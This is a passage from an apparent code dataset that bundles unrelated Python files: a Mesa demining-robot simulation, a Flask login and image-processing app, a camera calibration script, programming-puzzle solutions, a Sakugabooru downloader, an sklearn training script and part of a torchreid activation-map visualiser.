0.01\n\n\ndef move(x, y, speed, angle):\n return x + speed * math.cos(angle), y + speed * math.sin(angle)\n\n\ndef go_to(x, y, speed, dest_x, dest_y):\n if np.linalg.norm((x - dest_x, y - dest_y)) < speed:\n return (dest_x, dest_y), 2 * math.pi * random.random()\n else:\n angle = math.acos((dest_x - x)/np.linalg.norm((x - dest_x, y - dest_y)))\n if dest_y < y:\n angle = - angle\n return move(x, y, speed, angle), angle\n\n\nclass MarkerPurpose(Enum):\n DANGER = enum.auto(),\n INDICATION = enum.auto()\n\n\nclass ContinuousCanvas(VisualizationElement):\n local_includes = [\n \"./js/simple_continuous_canvas.js\",\n ]\n\n def __init__(self, canvas_height=500,\n canvas_width=500, instantiate=True):\n VisualizationElement.__init__(self)\n self.canvas_height = canvas_height\n self.canvas_width = canvas_width\n self.identifier = \"space-canvas\"\n if (instantiate):\n new_element = (\"new Simple_Continuous_Module({}, {},'{}')\".\n format(self.canvas_width, self.canvas_height, self.identifier))\n self.js_code = \"elements.push(\" + new_element + \");\"\n\n def portrayal_method(self, obj):\n return obj.portrayal_method()\n\n def render(self, model):\n representation = defaultdict(list)\n for obj in model.schedule.agents:\n portrayal = self.portrayal_method(obj)\n if portrayal:\n portrayal[\"x\"] = ((obj.x - model.space.x_min) /\n (model.space.x_max - model.space.x_min))\n portrayal[\"y\"] = ((obj.y - model.space.y_min) /\n (model.space.y_max - model.space.y_min))\n representation[portrayal[\"Layer\"]].append(portrayal)\n for 
obj in model.mines:\n portrayal = self.portrayal_method(obj)\n if portrayal:\n portrayal[\"x\"] = ((obj.x - model.space.x_min) /\n (model.space.x_max - model.space.x_min))\n portrayal[\"y\"] = ((obj.y - model.space.y_min) /\n (model.space.y_max - model.space.y_min))\n representation[portrayal[\"Layer\"]].append(portrayal)\n for obj in model.markers:\n portrayal = self.portrayal_method(obj)\n if portrayal:\n portrayal[\"x\"] = ((obj.x - model.space.x_min) /\n (model.space.x_max - model.space.x_min))\n portrayal[\"y\"] = ((obj.y - model.space.y_min) /\n (model.space.y_max - model.space.y_min))\n representation[portrayal[\"Layer\"]].append(portrayal)\n for obj in model.obstacles:\n portrayal = self.portrayal_method(obj)\n if portrayal:\n portrayal[\"x\"] = ((obj.x - model.space.x_min) /\n (model.space.x_max - model.space.x_min))\n portrayal[\"y\"] = ((obj.y - model.space.y_min) /\n (model.space.y_max - model.space.y_min))\n representation[portrayal[\"Layer\"]].append(portrayal)\n for obj in model.quicksands:\n portrayal = self.portrayal_method(obj)\n if portrayal:\n portrayal[\"x\"] = ((obj.x - model.space.x_min) /\n (model.space.x_max - model.space.x_min))\n portrayal[\"y\"] = ((obj.y - model.space.y_min) /\n (model.space.y_max - model.space.y_min))\n representation[portrayal[\"Layer\"]].append(portrayal)\n return representation\n\n\nclass Obstacle: # Environnement: obstacle infranchissable\n def __init__(self, x, y, r):\n self.x = x\n self.y = y\n self.r = r\n\n def portrayal_method(self):\n portrayal = {\"Shape\": \"circle\",\n \"Filled\": \"true\",\n \"Layer\": 1,\n \"Color\": \"black\",\n \"r\": self.r}\n return portrayal\n\n\nclass Quicksand: # Environnement: ralentissement\n def __init__(self, x, y, r):\n self.x = x\n self.y = y\n self.r = r\n\n def portrayal_method(self):\n portrayal = {\"Shape\": \"circle\",\n \"Filled\": \"true\",\n \"Layer\": 1,\n \"Color\": \"olive\",\n \"r\": self.r}\n return portrayal\n\n\nclass Mine: # Environnement: élément à ramasser\n def __init__(self, x, y):\n self.x = x\n self.y = y\n\n def portrayal_method(self):\n portrayal = {\"Shape\": \"circle\",\n \"Filled\": \"true\",\n \"Layer\": 2,\n \"Color\": \"black\",\n \"r\": 2}\n return portrayal\n\n\nclass Marker: # La classe pour les balises\n def __init__(self, x, y, purpose, direction=None):\n self.x = x\n self.y = y\n self.purpose = purpose\n if purpose == MarkerPurpose.INDICATION:\n if direction is not None:\n self.direction = direction\n else:\n raise ValueError(\"Direction should not be none for indication marker\")\n\n def portrayal_method(self):\n portrayal = {\"Shape\": \"circle\",\n \"Filled\": \"true\",\n \"Layer\": 2,\n \"Color\": \"red\" if self.purpose == MarkerPurpose.DANGER else \"green\",\n \"r\": 2}\n return portrayal\n\n\nclass Robot(Agent): # La classe des agents\n def __init__(self, unique_id: int, model: Model, x, y, speed, sight_distance, angle=0.0):\n super().__init__(unique_id, model)\n self.x = x\n self.y = y\n self.speed = speed\n self.sight_distance = sight_distance\n self.angle = angle\n self.counter = 0\n self.max_speed = speed\n self.counter = 0\n\n def step(self):\n # TODO L'intégralité du code du TP peut être ajoutée ici.\n if self.counter>0:\n self.counter-=1\n \n #DETRUIRE UNE MINE - NIVEAU 0\n defused = False\n mines = [mine for mine in self.model.mines if (self.x,self.y)==(mine.x,mine.y)]\n if len(mines)>0:\n self.model.mines.remove(mines[0])\n self.model.defused_mines+=1\n defused = True\n\n\n #CAS DE SABLES MOUVANTS\n quicksands = [quicksand for quicksand in 
self.model.quicksands if np.linalg.norm((self.x-quicksand.x,self.y-quicksand.y)) < quicksand.r]\n if quicksands:\n self.speed = self.max_speed/2\n self.model.steps_in_quicksands += 1\n else:\n self.speed = self.max_speed\n\n #HEAD TOWARD A VISIBLE MARKER\n to_marker = False\n markers = [marker for marker in self.model.markers if np.linalg.norm((self.x-marker.x,self.y-marker.y)) < self.sight_distance]\n if len(markers)>0:\n (x_next,y_next),self.angle = go_to(self.x,self.y,self.speed,markers[0].x,markers[0].y)\n to_marker = True\n # Collect a marker + move according to the collected marker's indication - LEVEL 3\n markers=[]\n if self.counter == 0:\n markers = [marker for marker in self.model.markers if (self.x,self.y)==(marker.x,marker.y)]\n if len(markers)>0:\n marker = markers[0]\n if marker.purpose == MarkerPurpose.DANGER:\n self.angle+= math.pi\n elif marker.purpose == MarkerPurpose.INDICATION:\n self.angle = marker.direction + math.pi/2\n self.model.markers.remove(marker)\n self.counter = 0\n #MOVE (CHANGE THE ANGLE) - LEVEL 5\n elif random.random() < PROBA_CHGT_ANGLE and not to_marker:\n self.angle = 2*math.pi*random.random()\n\n\n #HEAD TOWARD A MINE - LEVEL 2\n mines = [ mine for mine in self.model.mines if np.linalg.norm((self.x-mine.x ,self.y-mine.y )) < self.sight_distance]\n\n if len(mines)>0:\n (x_next,y_next),self.angle = go_to(self.x,self.y,self.speed,mines[0].x,mines[0].y)\n elif not to_marker:\n x_next,y_next = move(self.x,self.y,self.speed,self.angle)\n\n \n robots = [robot for robot in self.model.schedule.agents if np.linalg.norm((self.x-robot.x,self.y-robot.y)) < self.sight_distance and robot.unique_id != self.unique_id]\n isPossibleCollision = len(robots) != 0\n while True:\n if x_next < self.model.space.x_max and x_next > self.model.space.x_min and y_next < self.model.space.y_max and y_next > self.model.space.y_min and not isPossibleCollision:\n break\n\n self.angle = 2*math.pi *random.random()\n x_next,y_next = move(self.x,self.y,self.speed,self.angle)\n\n # Drop an INDICATION marker - LEVEL 0\n if defused: \n self.model.markers.append(Marker(self.x,self.y,MarkerPurpose.INDICATION,self.angle))\n self.counter=self.max_speed//2\n\n self.x,self.y = x_next,y_next\n\n\n def portrayal_method(self):\n portrayal = {\"Shape\": \"arrowHead\", \"s\": 1, \"Filled\": \"true\", \"Color\": \"Red\", \"Layer\": 3, 'x': self.x,\n 'y': self.y, \"angle\": self.angle}\n return portrayal\n\n\nclass MinedZone(Model):\n collector = DataCollector(\n model_reporters={\"Mines\": lambda model: len(model.mines),\n \"Danger markers\": lambda model: len([m for m in model.markers if\n m.purpose == MarkerPurpose.DANGER]),\n \"Indication markers\": lambda model: len([m for m in model.markers if\n m.purpose == MarkerPurpose.INDICATION]),\n \"Defused mines\": lambda model:model.defused_mines, \n \"Steps in quicksands\":lambda model:model.steps_in_quicksands, \n },\n agent_reporters={})\n\n def __init__(self, n_robots, n_obstacles, n_quicksand, n_mines, speed):\n Model.__init__(self)\n self.space = mesa.space.ContinuousSpace(600, 600, False)\n self.schedule = RandomActivation(self)\n self.mines = [] # Access list of mines from robot through self.model.mines\n self.markers = [] # Access list of markers from robot through self.model.markers (both read and write)\n self.obstacles = [] # Access list of obstacles from robot through self.model.obstacles\n self.quicksands = [] # Access list of quicksands from robot through self.model.quicksands\n for _ in range(n_obstacles):\n self.obstacles.append(Obstacle(random.random() * 500, random.random() * 500, 10 + 20 * random.random()))\n for _ in range(n_quicksand):\n self.quicksands.append(Quicksand(random.random() * 500, random.random() * 500, 10 + 20 * random.random()))\n for _ in range(n_robots):\n x, y = random.random() * 500, random.random() * 500\n while [o for o in self.obstacles if np.linalg.norm((o.x - x, o.y - y)) < o.r] or \\\n [o for o in self.quicksands if np.linalg.norm((o.x - x, o.y - y)) < o.r]:\n x, y = random.random() * 500, random.random() * 500\n
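# --- Aside (illustrative helper, not part of main.py): the spawn loops above
# --- are draw-and-retry rejection sampling; factored out it looks like this.
import random
import numpy as np

def sample_free_position(zones, size=500.0, max_tries=1000):
    """Draw (x, y) uniformly until it falls outside every circular zone."""
    for _ in range(max_tries):
        x, y = random.random() * size, random.random() * size
        if all(np.linalg.norm((z.x - x, z.y - y)) >= z.r for z in zones):
            return x, y
    raise RuntimeError("no obstacle-free position found")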
self.schedule.add(\n Robot(int(uuid.uuid1()), self, x, y, speed,\n 2 * speed, random.random() * 2 * math.pi))\n for _ in range(n_mines):\n x, y = random.random() * 500, random.random() * 500\n while [o for o in self.obstacles if np.linalg.norm((o.x - x, o.y - y)) < o.r] or \\\n [o for o in self.quicksands if np.linalg.norm((o.x - x, o.y - y)) < o.r]:\n x, y = random.random() * 500, random.random() * 500\n self.mines.append(Mine(x, y))\n self.datacollector = self.collector\n self.defused_mines = 0\n self.steps_in_quicksands = 0\n\n def step(self):\n self.datacollector.collect(self)\n self.schedule.step()\n if not self.mines:\n self.running = False\n\n\ndef run_single_server():\n chart = ChartModule([{\"Label\": \"Mines\",\n \"Color\": \"Orange\"},\n {\"Label\": \"Danger markers\",\n \"Color\": \"Red\"},\n {\"Label\": \"Indication markers\",\n \"Color\": \"Green\"},\n { \"Label\": \"Defused mines\",\n \"Color\":\"Blue\"},\n {\"Label\":\"Steps in quicksands\",\n \"Color\":\"Black\"}\n \n ],\n data_collector_name='datacollector')\n server = ModularServer(MinedZone,\n [ContinuousCanvas(),\n chart],\n \"Deminer robots\",\n {\"n_robots\": mesa.visualization.\n ModularVisualization.UserSettableParameter('slider', \"Number of robots\", 7, 3,\n 15, 1),\n \"n_obstacles\": mesa.visualization.\n ModularVisualization.UserSettableParameter('slider', \"Number of obstacles\", 5, 2, 10, 1),\n \"n_quicksand\": mesa.visualization.\n ModularVisualization.UserSettableParameter('slider', \"Number of quicksand\", 5, 2, 10, 1),\n \"speed\": mesa.visualization.\n ModularVisualization.UserSettableParameter('slider', \"Robot speed\", 15, 5, 40, 5),\n \"n_mines\": mesa.visualization.\n ModularVisualization.UserSettableParameter('slider', \"Number of mines\", 15, 5, 30, 1)})\n server.port = 8521\n server.launch()\n\n\nif __name__ == \"__main__\":\n run_single_server()\n","repo_name":"AmaniMokni/Multi_agents_IA310","sub_path":"IA310_TP3/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":15895,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"26363879537","text":"from flask import Flask, render_template, request\nfrom flask_login import LoginManager, login_user, logout_user, login_required, UserMixin,current_user\nfrom shoulder import Shoulder\nfrom image import MyImage\nimport numpy as np\nimport cv2\nimport os\nimport datetime\nfrom model import MySQL\n\nSAVE_DIR = './static/images'\n\napp = Flask(__name__)\nlogin_manager = LoginManager()\nlogin_manager.init_app(app)\napp.config['SECRET_KEY'] = os.urandom(24)\n\n\n## User authentication\n\n\nclass User(UserMixin):\n def __init__(self, id, name):\n self.id = id\n self.name = name\n\n@login_manager.user_loader\ndef load_user(id):\n user_id = int(id)\n db = MySQL()\n user_name = db.user_loader(user_id)\n db.close()\n if (user_name != None):\n return User(user_id, user_name)\n else:\n return None\n\n\n## Pages\n\n\n# Index\n@app.route('/')\n@login_required\ndef index():\n return render_template('index.html', title='インデックス')\n\n# Main\n@app.route('/main', methods=['POST'])\n@login_required\ndef main():\n if request.method == 'POST':\n company_name = request.form['company_name']\n company_stage = request.form['company_stage']\n session_timestamp = str(datetime.datetime.now())[0:19]\n return render_template('main.html', title='メイン', session_timestamp=session_timestamp, company_name=company_name, company_stage=company_stage)\n else:\n return render_template('index.html', title='インデックス')\n\n
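# --- Aside (illustrative, standalone): the session timestamp above is taken by
# --- slicing str(datetime.datetime.now())[0:19]; an explicit strftime format
# --- expresses the same "YYYY-MM-DD HH:MM:SS" intent without relying on slicing.
import datetime

stamp = datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S')
assert len(stamp) == 19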
# Save\n@app.route('/save', methods=['POST'])\n@login_required\ndef save():\n if request.method == 'POST':\n\n session = request.form['session']\n result = request.form['result']\n sentence = request.form['sentence']\n image = request.form['image']\n\n db = MySQL()\n\n session_list = session.split(',')\n session_id = db.insert_session(int(current_user.id), session_list[0], session_list[1], session_list[2])\n\n result_list = result.split(',')\n result_id = db.insert_result(session_id, str(result_list[0]), str(result_list[1]))\n\n sentence_list = sentence.split('|')\n for sentence_row in sentence_list:\n sentence_ele = sentence_row.split(',')\n if len(sentence_ele) != 1 and sentence_ele[2] != 'Infinity':\n db.insert_sentence(result_id, str(sentence_ele[0]), str(sentence_ele[1]), int(sentence_ele[2]))\n\n\n image_list = image.split('|')\n for image_row in image_list:\n image_ele = image_row.split(',')\n if len(image_ele) != 1:\n db.insert_image(result_id, str(image_ele[0]), str(image_ele[1]), str(image_ele[2]))\n\n db.close()\n\n return render_template('index.html', title='インデックス')\n else:\n return render_template('index.html', title='インデックス')\n\n# Archive\n@app.route('/archive')\n@login_required\ndef archive():\n\n db = MySQL()\n rows = db.archive(int(current_user.id))\n db.close()\n\n return render_template('archive.html', title='アーカイブ',rows=rows)\n\n# Archive detail\n@app.route('/archive/<id>')\n@login_required\ndef archive_detail(id):\n session_id = id\n db = MySQL()\n row_session, row_result, log_list = db.archive_detail(session_id)\n db.close()\n return render_template('archive_detail.html', title='アーカイブ詳細', row_session=row_session, row_result=row_result, log_list=log_list)\n\n# Settings\n@app.route('/settings')\n@login_required\ndef settings():\n return render_template('settings.html', title='設定')\n\n# Edit settings\n@app.route('/settings_edit')\n@login_required\ndef settings_edit():\n return render_template('settings_edit.html', title='設定')\n\n\n## Login features\n\n\n# Log in\n@app.route('/login', methods=['GET', 'POST'])\ndef login():\n if(request.method == 'POST'):\n user_name = request.form['user_name']\n password = request.form['password']\n\n db = MySQL()\n flag, user_id = db.login(user_name, password)\n db.close()\n\n if(flag):\n user = User(user_id, user_name)\n login_user(user)\n return render_template('index.html', title='インデックス')\n else:\n return render_template('login.html', title='ログイン', message='ログインできませんでした')\n\n else:\n return render_template('login.html', title='ログイン', message='ログインしてください')\n\n# Log out\n@app.route('/logout')\n@login_required\ndef logout():\n logout_user()\n return render_template('login.html', title='ログイン', message='ログインしてください。')\n\n# When the user is not logged in\n@login_manager.unauthorized_handler\ndef unauthorized_handler():\n return render_template('login.html', title='ログイン', message='ログインしてください。')\n\n# Sign up\n@app.route('/signup', methods=['GET', 'POST'])\ndef signup():\n if(request.method == 'POST'):\n db = MySQL()\n flag = db.signup(request.form['user_name'], request.form['password'])\n db.close()\n if (flag):\n return render_template('login.html', title='ログイン', message='ログインしてください')\n else:\n return render_template('signup.html', title='新規登録', message ='IDがすでに使われています')\n else:\n return render_template('signup.html', title='新規登録', message ='新規登録')\n\n\n
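# --- Aside (illustrative, standalone): the /shoulder route below decodes an
# --- uploaded image from raw bytes; in isolation the decode path looks like this.
import numpy as np
import cv2

def decode_upload(raw: bytes):
    buf = np.asarray(bytearray(raw), dtype=np.uint8)
    img = cv2.imdecode(buf, cv2.IMREAD_COLOR)  # cv2.IMREAD_COLOR == 1; None if undecodable
    if img is None:
        raise ValueError("payload is not a decodable image")
    return img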
# Image processing\n\n\n# Detection\n@app.route('/shoulder', methods=['POST'])\ndef shoulder():\n stream = request.files['image'].stream\n img_array = np.asarray(bytearray(stream.read()), dtype=np.uint8)\n img = cv2.imdecode(img_array, 1)\n\n shoulder = Shoulder(img)\n result, save_path = shoulder.detect()\n\n return result + ',' + save_path\n\n# Image-processing demo\n@app.route('/all_images')\ndef all_images():\n path = './static/images/all'\n files = os.listdir(path)\n files_dir = [f for f in files if os.path.isdir(os.path.join(path, f))]\n if len(files_dir)>1:\n return render_template('all_images.html', title='処理過程', dir_name=files_dir[len(files_dir)-1])\n else: # provide a placeholder directory so no error occurs: 00000000_000000\n return render_template('all_images.html', title='処理過程', dir_name=\"00000000_000000\")\n\n\n# Startup configuration\nif __name__ == '__main__':\n app.run(debug=True)","repo_name":"Hayashi08/hf21","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":6369,"program_lang":"python","lang":"ja","doc_type":"code","stars":1,"dataset":"github-code","pt":"7"} +{"seq_id":"20624242583","text":"#coding:utf-8\nimport cv2\nimport numpy as np\nimport glob\n\ndef calibrateCamera9x6(jpgfilepath,cfgsavepath,ChessSize=25):\n\n # find the chessboard corners\n # termination criteria\n criteria = (cv2.TERM_CRITERIA_EPS + cv2.TERM_CRITERIA_MAX_ITER, ChessSize, 0.001)\n #checkerboard template size\n w = 9\n h = 6\n # chessboard points in world coordinates, e.g. (0,0,0), (1,0,0), (2,0,0) ....,(8,5,0); drop the Z coordinate and store them as a 2D matrix\n objp = np.zeros((w*h,3), np.float32)\n objp[:,:2] = np.mgrid[0:w,0:h].T.reshape(-1,2)\n # store pairs of world/image coordinates for the chessboard corners\n objpoints = [] # 3D points in the world coordinate system\n imgpoints = [] # 2D points in the image plane\n\n images = glob.glob(jpgfilepath+'/*.jpg')\n for fname in images:\n img = cv2.imread(fname)\n gray = cv2.cvtColor(img,cv2.COLOR_BGR2GRAY)\n # detect the chessboard corners\n ret, corners = cv2.findChessboardCorners(gray, (w,h),None)\n # if enough point pairs were found, store them\n if ret == True:\n cv2.cornerSubPix(gray,corners,(11,11),(-1,-1),criteria)\n objpoints.append(objp)\n imgpoints.append(corners)\n # draw the corners on the image\n cv2.drawChessboardCorners(img, (w,h), corners, ret)\n cv2.imshow('findCorners',img)\n cv2.waitKey(1)\n cv2.destroyAllWindows()\n\n # calibrate\n ret, mtx, dist, rvecs, tvecs = cv2.calibrateCamera(objpoints, imgpoints, gray.shape[::-1], None, None)\n print(mtx)\n print(dist)\n\n #save the results\n fs = cv2.FileStorage(cfgsavepath, cv2.FileStorage_WRITE)\n fs.write('mtx',mtx)\n fs.write('dist',dist)\n fs.release()\n\n #\n # reprojection error\n total_error = 0\n for i in range(len(objpoints)):\n imgpoints2, _ = cv2.projectPoints(objpoints[i], rvecs[i], tvecs[i], mtx, dist)\n error = cv2.norm(imgpoints[i],imgpoints2, cv2.NORM_L2)/len(imgpoints2)\n total_error += error\n total_error=total_error/len(objpoints)\n\n return total_error\n\nif __name__ == \"__main__\":\n\n err=calibrateCamera9x6('res/ANCcam_1080p','res/anccameraMTX.json')\n print(\"total_error:\",err)\n\n # undistortion\n '''\n img2 = cv2.imread('calib/00169.png')\n h, w = img2.shape[:2]\n newcameramtx, roi=cv2.getOptimalNewCameraMatrix(mtx,dist,(w,h),0,(w,h)) # free scaling parameter\n dst = cv2.undistort(img2, mtx, dist, None, newcameramtx)\n # crop the image to the ROI from above\n #x,y,w,h = roi\n #dst = dst[y:y+h, x:x+w]\n cv2.imwrite('calibresult.png',dst)\n '''\n\n","repo_name":"kidtic/RGBLED_Position","sub_path":"test/cameraCalibrate.py","file_name":"cameraCalibrate.py","file_ext":"py","file_size_in_byte":2512,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"7"}
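# --- Companion sketch (illustrative): reloading the intrinsics that
# --- calibrateCamera9x6() saves and undistorting one frame. The input filename
# --- 'frame.jpg' is an assumption; the storage path comes from the code above.
import cv2

fs = cv2.FileStorage('res/anccameraMTX.json', cv2.FILE_STORAGE_READ)
mtx, dist = fs.getNode('mtx').mat(), fs.getNode('dist').mat()
fs.release()

img = cv2.imread('frame.jpg')
h, w = img.shape[:2]
newcameramtx, roi = cv2.getOptimalNewCameraMatrix(mtx, dist, (w, h), 0, (w, h))
cv2.imwrite('undistorted.jpg', cv2.undistort(img, mtx, dist, None, newcameramtx))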
{"seq_id":"73511111904","text":"# BJ 1074 Z <divide and conquer, recursion>\n# https://www.acmicpc.net/problem/1074\n# time : 20\n# problem review : M,R\n# retrospective : I solved the problem with divide and conquer via a recursive function.\n# The Best Pythonic Code, however, found the rule for the row and column increments by reading the binary values as base-4 numbers, and expressed it in one line... amazing\n\n\ndef solution(n, r, c, t):\n if n==0:\n return t\n if r<(2**(n-1)) and c<(2**(n-1)):\n return solution(n-1, r, c, t)\n elif r<(2**(n-1)) and c>=(2**(n-1)):\n return solution(n-1, r, c-2**(n-1), t+2**(2*(n-1)))\n elif r>=(2**(n-1)) and c<(2**(n-1)):\n return solution(n-1, r-2**(n-1), c, t+2*2**(2*(n-1)))\n else:\n return solution(n-1, r-2**(n-1), c-2**(n-1), t+3*2**(2*(n-1)))\n \nN,r,c=map(int,input().split())\nprint(solution(N,r,c,0))\n\n\n''' Best Pythonic Code\nn,r,c=map(int,input().split());print(int(f'{c:b}',4)+2*int(f'{r:b}',4))\n'''","repo_name":"ddooom/CodingTest","sub_path":"problems/202109/[M,R]_[BJ_1074_Z]_[분할정복,재귀].py","file_name":"[M,R]_[BJ_1074_Z]_[분할정복,재귀].py","file_ext":"py","file_size_in_byte":953,"program_lang":"python","lang":"ko","doc_type":"code","stars":1,"dataset":"github-code","pt":"7"} +{"seq_id":"34551897819","text":"import os, re, urllib3\nfrom bs4 import BeautifulSoup as bs\nfrom typing import List\n\nspecialCharacters = {\n '\\\\': '',\n '/': '',\n ':': '',\n '*': '',\n '?': '',\n '\"': '',\n '<': '',\n '>': '',\n '|': ''\n}\nmainFolder = \"Sakugabooru Downloads\"\nhttp = urllib3.PoolManager()\n\ndef search(infos : List, className : str) -> List:\n lst = []\n for element in infos:\n if element[\"class\"] == [className]:\n childElement = element.findChildren('a')\n for target in childElement:\n if target.text != '?':\n lst += [target.text]\n return lst\n\ndef nameFile(res, id : str) -> str:\n soup = bs(res.data,\"html.parser\")\n data = soup.find('ul', id=\"tag-sidebar\")\n infos = data.findChildren('li')\n ext = soup.find('a', id=\"highres\")[\"href\"].split('.')[-1]\n\n artists = ' & '.join(search(infos, \"tag-type-artist\"))\n copyrights = ' '.join(search(infos, \"tag-type-copyright\"))\n\n fileName = f\"{copyrights} By {artists} ({id}).{ext}\".translate(str.maketrans(specialCharacters))\n\n return fileName\n\ndef grabPost(folder : str, id : str):\n link = f\"https://www.sakugabooru.com/post/show/{id}\"\n res = http.request('GET', link)\n mediaLink = bs(res.data, \"html.parser\").find('a', id=\"highres\")[\"href\"]\n\n media = nameFile(res, id)\n print(f\"DOWNLOADING : {media}\")\n\n if not os.path.exists(folder):\n os.makedirs(folder)\n\n filepath = f\"{folder}/{media}\"\n\n with open(filepath, 'wb+') as targetfile:\n dt = http.request('GET', mediaLink)\n targetfile.write(dt.data)\n print(f\"SUCCESS : {media}\")\n\ndef getId(link : str) -> str:\n return re.search(r\"(\\d+)\", link).group(1)\n\ndef downlodFromId(link : str) -> None:\n id = getId(link)\n grabPost(mainFolder, id)\n\ndef downlodBulk(link : str) -> None:\n tags = link.split(\"=\")[-1] \n tagsLink = f\"https://www.sakugabooru.com/post.xml?tags={tags}\"\n pageNumber = 1\n\n res = http.request('GET', tagsLink)\n soup = bs(res.data, \"lxml\")\n posts = soup.find(\"posts\")\n postCount = int(posts[\"count\"])\n\n print(f\"{postCount} posts found.\")\n print(\"Downloading ...\")\n\n while postCount > 0:\n url = f\"{tagsLink}&limit=100&page={pageNumber}\"\n\n res = http.request('GET', url)\n soup = bs(res.data, \"lxml\")\n posts = soup.findAll(\"post\")\n\n for post in posts:\n grabPost(mainFolder, post[\"id\"])\n \n postCount -= 100\n pageNumber += 1\n\ndef downloadPool(link : str) -> None:\n res = http.request('GET', link)\n soup = bs(res.data, \"html.parser\")\n posts = soup.find_all('span', attrs={\"class\" : \"plid\"})\n poolTitle = soup.find(\"div\", attrs={\"id\" : \"pool-show\"}).find(\"h4\").text.split(':')[-1].strip()\n \n folder = f\"{mainFolder}/{poolTitle}\"\n\n for post in posts:\n
grabPost(folder, getId(post.text))\n\nif __name__ == \"__main__\":\n links = input(\"Paste your links here : \").strip().split() \n errors = []\n\n for link in links:\n try:\n if \"tags=\" in link:\n downlodBulk(link)\n elif \"pool\" in link: \n downloadPool(link)\n else : \n downlodFromId(link)\n except:\n errors += link,\n \n if errors:\n with open(f\"{mainFolder}/ERRORS.txt\", \"w+\") as errorLog:\n for link in errors:\n errorLog.write(link + '\\n')\n\n print(\"DONE !!\")","repo_name":"RedaZt/SakugaGrabber","sub_path":"sakugagrabber.py","file_name":"sakugagrabber.py","file_ext":"py","file_size_in_byte":3431,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"7"} +{"seq_id":"14527903600","text":"class Solution:\n def isPalindrome(self, head: Optional[ListNode]) -> bool:\n \"\"\"\n Given the head of a singly linked list, returns True if\n it is a palindrome or false otherwise. This one really\n highlighted that I don't know much about leveraging the\n structure of linked lists.\n \"\"\"\n \n # convert linked list to a digit string\n current_value = [head.val]\n while head.next != None:\n current_value.append(head.next.val)\n head = head.next\n\n # compare to its reverse\n return current_value == current_value[::-1]\n","repo_name":"Foggalong/leetcode","sub_path":"problems/palindrome_linked_list/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":616,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"16333668315","text":"from util import *\nimport tensorflow as tf\nimport tensorflow.contrib.learn as learn\nimport scipy.stats\nimport numpy as np\nimport time\nfrom sklearn.ensemble import RandomForestClassifier\nfrom sklearn.ensemble import ExtraTreesClassifier\nfrom sklearn.ensemble import AdaBoostRegressor\nimport sklearn\nfrom sklearn.ensemble import RandomForestRegressor\n\nclass TrainSKLearn(TrainModel):\n def __init__(self, data_set, name, alg, run_single_fold):\n super().__init__(data_set, run_single_fold)\n self.name=name\n self.alg=alg\n self.early_stop = 50\n self.params = str(alg)\n\n\n def train_model(self, x_train, y_train, x_val, y_val):\n print(\"Training SKLearn model: {}\".format(self.alg))\n\n x_train = x_train.as_matrix().astype(np.float32)\n y_train = y_train.as_matrix().astype(np.int32)\n\n #x_val = x_val.as_matrix().astype(np.float32)\n #y_val = y_val.as_matrix().astype(np.int32)\n\n self.alg.fit(x_train, y_train)\n\n self.steps = 0\n\n #self.classifier = clr.best_iteration\n return self.alg\n\n def predict_model(self, clr, x):\n x = x.as_matrix().astype(np.float32)\n\n if FIT_TYPE == FIT_TYPE_REGRESSION:\n return clr.predict(x)\n else:\n pred = clr.predict_proba(x)\n pred = np.array([v[1] for v in pred])\n return pred\n\n# \"all the time\" to \"always\"\n# reall short ones that are dead wrong\n\n# [100]\ttrain-logloss:0.288795\teval-logloss:0.329036\n# [598]\ttrain-logloss:0.152968\teval-logloss:0.296854\n# [984]\ttrain-logloss:0.096444\teval-logloss:0.293915\n\nn_trees = 100\nn_folds = 3\n\n# https://www.analyticsvidhya.com/blog/2015/06/tuning-random-forest-model/\nalg_list = [\n #['rforest',RandomForestRegressor(n_estimators=1000, n_jobs=-1, max_depth=3, criterion='mae')],\n #['extree',ExtraTreesClassifier(n_estimators = 1000,max_depth=2)],\n ['adaboost',AdaBoostRegressor(base_estimator=None, n_estimators=600, learning_rate=1.0, random_state=20160703)],\n #['knn', sklearn.neighbors.KNeighborsRegressor(n_neighbors=5)]\n]\n\nfor name,alg in 
alg_list:\n train = TrainSKLearn(\"1\",name,alg,False)\n train.run()\n train = None\n","repo_name":"MattHuntebrinker/earthquake","sub_path":"train_sklearn.py","file_name":"train_sklearn.py","file_ext":"py","file_size_in_byte":2174,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"72859804702","text":"import numpy as np\nimport os.path as osp\nimport argparse\nimport cv2\nimport torch\nfrom torch.nn import functional as F\n\nimport torchreid\nfrom torchreid.utils import (\n check_isfile, mkdir_if_missing, load_pretrained_weights\n)\n\nIMAGENET_MEAN = [0.485, 0.456, 0.406]\nIMAGENET_STD = [0.229, 0.224, 0.225]\nGRID_SPACING = 10\n\n\n@torch.no_grad()\ndef visactmap(\n model,\n test_loader,\n save_dir,\n width,\n height,\n use_gpu,\n img_mean=None,\n img_std=None\n):\n if img_mean is None or img_std is None:\n # use imagenet mean and std\n img_mean = IMAGENET_MEAN\n img_std = IMAGENET_STD\n\n model.eval()\n\n for target in list(test_loader.keys()):\n data_loader = test_loader[target]['query'] # only process query images\n # original images and activation maps are saved individually\n actmap_dir = osp.join(save_dir, 'actmap_' + target)\n mkdir_if_missing(actmap_dir)\n print('Visualizing activation maps for {} ...'.format(target))\n\n for batch_idx, data in enumerate(data_loader):\n imgs, paths = data['img'], data['impath']\n if use_gpu:\n imgs = imgs.cuda()\n\n # forward to get convolutional feature maps\n try:\n outputs = model(imgs, return_featuremaps=True)\n except TypeError:\n raise TypeError(\n 'forward() got unexpected keyword argument \"return_featuremaps\". '\n 'Please add return_featuremaps as an input argument to forward(). When '\n 'return_featuremaps=True, return feature maps only.'\n )\n\n if outputs.dim() != 4:\n raise ValueError(\n 'The model output is supposed to have '\n 'shape of (b, c, h, w), i.e. 4 dimensions, but got {} dimensions. 
